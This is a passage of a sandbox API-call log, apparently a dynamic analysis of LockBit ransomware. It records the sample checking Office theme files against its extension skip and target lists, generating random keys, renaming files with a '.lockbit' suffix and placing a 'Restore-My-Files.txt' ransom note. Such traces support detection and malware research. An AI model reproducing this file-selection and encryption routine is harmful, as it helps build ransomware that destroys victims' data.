[0194.213] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Equity.eftx") returned 1 [0194.213] lstrcmpiW (lpString1="ntldr", lpString2="Equity.eftx") returned 1 [0194.213] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Equity.eftx") returned 1 [0194.213] lstrcmpiW (lpString1="bootsect.bak", lpString2="Equity.eftx") returned -1 [0194.213] lstrcmpiW (lpString1="autorun.inf", lpString2="Equity.eftx") returned -1 [0194.213] lstrcmpiW (lpString1="thumbs.db", lpString2="Equity.eftx") returned 1 [0194.213] lstrcmpiW (lpString1="iconcache.db", lpString2="Equity.eftx") returned 1 [0194.213] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.213] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx") returned=".eftx" [0194.213] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.213] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.213] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.214] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.214] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.214] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.214] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.214] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.214] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.214] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.lockbit") returned 87 [0194.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.215] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.215] malloc (_Size=0x40068) returned 0x3df0008 [0194.215] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24611) returned 1 [0194.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.216] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.227] malloc (_Size=0xc4) returned 0x1fa2ed8 [0194.227] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0194.229] free (_Block=0x1fa2ed8) [0194.229] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.229] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.229] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f12100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x49f12100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x3fde, dwReserved0=0x0, dwReserved1=0x0, cFileName="Essential.eftx", cAlternateFileName="ESSENT~1.EFT")) returned 1 [0194.229] lstrcmpiW (lpString1=".", lpString2="Essential.eftx") returned -1 [0194.229] lstrcmpiW (lpString1="..", lpString2="Essential.eftx") returned -1 [0194.229] PathFindExtensionW (pszPath="Essential.eftx") returned=".eftx" [0194.229] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.229] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.229] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.230] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Essential.eftx") returned 1 [0194.231] lstrcmpiW (lpString1="ntldr", lpString2="Essential.eftx") returned 1 [0194.231] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Essential.eftx") returned 1 [0194.231] lstrcmpiW (lpString1="bootsect.bak", lpString2="Essential.eftx") returned -1 [0194.231] lstrcmpiW (lpString1="autorun.inf", lpString2="Essential.eftx") returned -1 [0194.231] lstrcmpiW (lpString1="thumbs.db", lpString2="Essential.eftx") returned 1 [0194.231] lstrcmpiW (lpString1="iconcache.db", lpString2="Essential.eftx") returned 1 [0194.231] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.231] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx") returned=".eftx" [0194.231] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.231] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.231] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.232] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.232] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.232] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.232] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.lockbit") returned 90 [0194.232] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.233] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.233] malloc (_Size=0x40068) returned 0x3df0008 [0194.233] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16350) returned 1 [0194.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.234] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.238] malloc (_Size=0xca) returned 0x77d7a8 [0194.238] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.239] free (_Block=0x77d7a8) [0194.239] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.239] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.240] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a02900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5abff20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x79a02900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x52a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Executive.eftx", cAlternateFileName="EXECUT~1.EFT")) returned 1 [0194.240] lstrcmpiW (lpString1=".", lpString2="Executive.eftx") returned -1 [0194.240] lstrcmpiW (lpString1="..", lpString2="Executive.eftx") returned -1 [0194.240] PathFindExtensionW (pszPath="Executive.eftx") returned=".eftx" [0194.240] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.240] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.240] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.241] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.241] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.241] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Executive.eftx") returned 1 [0194.241] lstrcmpiW (lpString1="ntldr", lpString2="Executive.eftx") returned 1 [0194.241] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Executive.eftx") returned 1 [0194.241] lstrcmpiW (lpString1="bootsect.bak", lpString2="Executive.eftx") returned -1 [0194.241] lstrcmpiW (lpString1="autorun.inf", lpString2="Executive.eftx") returned -1 [0194.241] lstrcmpiW (lpString1="thumbs.db", lpString2="Executive.eftx") returned 1 [0194.241] lstrcmpiW (lpString1="iconcache.db", lpString2="Executive.eftx") returned 1 [0194.241] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.241] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx") returned=".eftx" [0194.241] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.241] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.242] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.242] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.242] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.lockbit") returned 90 [0194.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.244] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.244] malloc (_Size=0x40068) returned 0x3df0008 [0194.244] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21156) returned 1 [0194.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.245] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.245] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0194.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.249] malloc (_Size=0xca) returned 0x77d7a8 [0194.250] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.251] free (_Block=0x77d7a8) [0194.251] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.251] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme 